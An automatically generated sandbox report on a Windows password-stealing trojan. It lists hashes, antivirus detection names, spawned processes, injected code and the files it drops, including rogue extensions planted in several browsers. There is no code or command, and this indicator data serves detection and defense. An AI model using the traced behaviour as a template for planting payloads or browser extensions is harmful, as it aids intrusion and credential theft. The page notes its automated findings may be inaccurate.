Gen.Variant.Zusy.206436_a1bbca8139

by malwarelabrobot on January 10th, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.206436 (B) (Emsisoft), Gen:Variant.Zusy.206436 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: a1bbca8139bdabe892df787bea434c33
SHA1: e8042c20f5bb729788169526aeb593c0b7fbe6a7
SHA256: 0b14af2ff95be8854ecc788c951e747b3cacbf1a45e64d8c0c28a25bbc528c84
SSDeep: 98304:spdtSgDeSy0mrIgH4xxX2Etg69BEKzgXzu15:Zrz4xxZg6PkXzm
Size: 3493888 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftWindowsShortcutfile, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2016-12-06 17:56:49
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-PSW: a Trojan program intended for stealing users' passwords.

Payload

Behaviour  Description
EmailWorm  The worm can send e-mails.


Process activity

The Trojan creates the following process(es):

HC188.exe:2748
WScript.exe:2632
src2011.tmp:372
src2011.exe:3732
bFuAq.exe:3352
1819.exe:3564
rundll32.exe:3404
mm.exe:2712
regsvr32.exe:2260
mmc.exe:3368
guide.exe:2532
guide.exe:672
otqvyruekg.exe:3296

The Trojan injects its code into the following process(es):

%original file name%.exe:2180

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process HC188.exe:2748 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\1819.exe (50 bytes)
C:\Windows\mm.exe (299 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\hyaz2_Y_10031[1].exe (28065 bytes)
C:\Windows\src2011.exe (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\src2011[1].exe (565882 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\yy[1].txt (301 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\1819[1].exe (527707 bytes)

The process WScript.exe:2632 makes changes in the file system.
The Trojan deletes the following file(s):

C:\Windows\1819.exe (0 bytes)
C:\Windows\tem.vbs (0 bytes)

The process src2011.tmp:372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-B9OOF.tmp (1281 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-MF5A3.tmp (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\xmlconfig\is-RP6UK.tmp (663 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\is-19N56.tmp (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-460JK.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-FVIO4.tmp (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-2MIAD.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\DirectUI\is-IADDD.tmp (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\is-NICJE.tmp (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-HVUIH.tmp (2105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-T9LKT.tmp (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-3KJB6.tmp (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-J5JMM.tmp (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-CAITJ.tmp (13800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-G6L66.tmp (2321 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\DirectUI\is-2VABS.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-B8MLT.tmp (4185 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\is-065I6.tmp (57 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-A0FE6.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-9S1N0.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J759K.tmp\ISTask.dll (687 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\chromeNativeClient\is-G7L8O.tmp (2105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-IK8SG.tmp (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-7F8IN.tmp (3361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-PBIU3.tmp (2321 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-LF318.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\is-8PHSQ.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\DirectUI\is-5ICHK.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\is-20378.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-LUS01.tmp (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-CTN93.tmp (3361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-RPA16.tmp (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-UL91T.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.d (438 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-T50I1.tmp (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-BHK2S.tmp (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J759K.tmp\_isetup\_shfoldr.dll (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-4EB2H.tmp (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-7ON68.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-PEBLC.tmp (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-0PTE5.tmp (88 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\chromeNativeClient\is-SM9S4.tmp (412 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\is-RVOIL.tmp (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-8NQQU.tmp (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-SMSJL.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-ULD5Q.tmp (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-L3U6R.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\is-4Q56G.tmp (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-9FV32.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-7LBB8.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-SIFLR.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-6SUBS.tmp (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-9G0BA.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-R6SC4.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-9T08E.tmp (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-UBRU8.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\xmlconfig\is-EPA69.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\is-K9B92.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-C1SG6.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyueservice.exe (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\DirectUI\is-TO7V8.tmp (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-AGEEL.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-A35DN.tmp (2 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J759K.tmp\ISTask.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J759K.tmp\_isetup\_shfoldr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J759K.tmp\_isetup (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J759K.tmp (0 bytes)

The process src2011.exe:3732 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-4SP61.tmp\src2011.tmp (1423 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-4SP61.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-4SP61.tmp\src2011.tmp (0 bytes)

The process bFuAq.exe:3352 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\onest.txt (1 bytes)
C:\Windows\Report.log (7 bytes)

The process 1819.exe:3564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Media\McIe.wav (17 bytes)
C:\Windows\Media\Mcfg.wav (1 bytes)
C:\Windows\tAzJsX\27e.exe (108 bytes)
C:\Windows\tAzJsX\bFuAq.exe (218 bytes)
C:\Windows\tAzJsX\Dqc.exe (108 bytes)
C:\Windows\tAzJsX\G57.exe (108 bytes)
C:\Windows\tAzJsX\BPp.exe (108 bytes)
C:\Windows\onest.txt (1 bytes)
C:\Windows\tAzJsX\PTR.exe (108 bytes)
C:\Windows\Media\hd.wav (1 bytes)
C:\Windows\mcconfig.dat (2 bytes)
C:\Windows\pcq.exe (108 bytes)
C:\Windows\tAzJsX\LiveUDHelper.dll (1 bytes)
C:\Windows\tAzJsX\drH.exe (108 bytes)
C:\Windows\tAzJsX\MIJ.exe (108 bytes)
C:\Windows\tem.vbs (169 bytes)

The process rundll32.exe:3404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games\Steam Dark Messiah Might and Magic Single Player™.lnk (280 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B912B2C6928A18B8CD7D50CF08BEA95B_481E03432F6D1AE9D28AB3294512C01D (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\GameExplorer\{98A0A23D-0A5F-4D35-9D4A-DAF2B7F0CF43}\PlayTasks\0\Play.lnk (756 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab6344.tmp (51 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1DAF2884EC4DFA96BA4A58D4DBC9C406 (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar6345.tmp (2712 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B912B2C6928A18B8CD7D50CF08BEA95B_481E03432F6D1AE9D28AB3294512C01D (1848 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DAF2884EC4DFA96BA4A58D4DBC9C406 (804 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar6345.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab6344.tmp (0 bytes)

The process mm.exe:2712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\WindowsUpdate\otqvyruekg.exe (47523 bytes)

The process %original file name%.exe:2180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\HC188.exe (1522 bytes)

The process mmc.exe:3368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\st.dat (75 bytes)
C:\Windows\Media\[i1HKe].mp3 (1 bytes)
C:\Windows\star.dat (44 bytes)
C:\Windows\webpid.txt (4 bytes)

The process guide.exe:2532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\res\crx.png (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\background.js (772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
%Program Files%\Google\Chrome\Application\54.0.2840.59\resources.pak (597622 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\_metadata\verified_contents.json (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\cupdate.dat (157 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (8273 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\_metadata\computed_hashes.json (1060 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\_metadata\verified_contents.json (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\background.js (772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\background.js (772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (88 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\jyrl\config\rili.ini (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\_metadata\verified_contents.json (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\res\crx.png (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fe2c\jyrili.exe (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\_metadata\computed_hashes.json (1060 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\7zxr.dll (18123 bytes)
